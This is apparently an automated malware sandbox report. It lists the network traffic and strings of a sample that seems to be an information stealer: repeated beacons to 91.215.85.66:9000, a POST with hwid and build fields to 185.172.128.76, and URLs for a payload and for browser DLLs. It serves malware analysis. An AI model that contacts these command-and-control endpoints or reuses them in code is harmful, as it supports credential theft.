Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 43 44 32 39 43 46 32 33 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"6DCD29CF23942138104604------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"default10------AEHIJKKFHIEGCBGCAFIJ--

Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll$
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dllv
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dlln
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dllKqu~
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dllXqF~
Source: u5g0.0.exe, 00000001.00000003.1815139998.0000000002FDC000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php4
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php4c907fa2d7673d07aad082bec644breleaseb647486d6fbdfc634912e9
Source: u5g0.0.exe, 00000001.00000003.1815221199.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpQ
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpX
Source: u5g0.0.exe, 00000001.00000003.1815139998.0000000002FDC000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpo
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76r
Source: MSBuild.exe, 0000000E.00000002.2928216488.0000000003312000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:
Source: MSBuild.exe, 0000000E.00000002.2928216488.0000000003312000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 0000000E.00000002.2928216488.0000000003312000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2921328359.000000000149F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
Source: MSBuild.exe, 0000000E.00000002.2921328359.000000000149F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08F
Source: MSBuild.exe, 0000000E.00000002.2928216488.000000000336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000t-dq
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
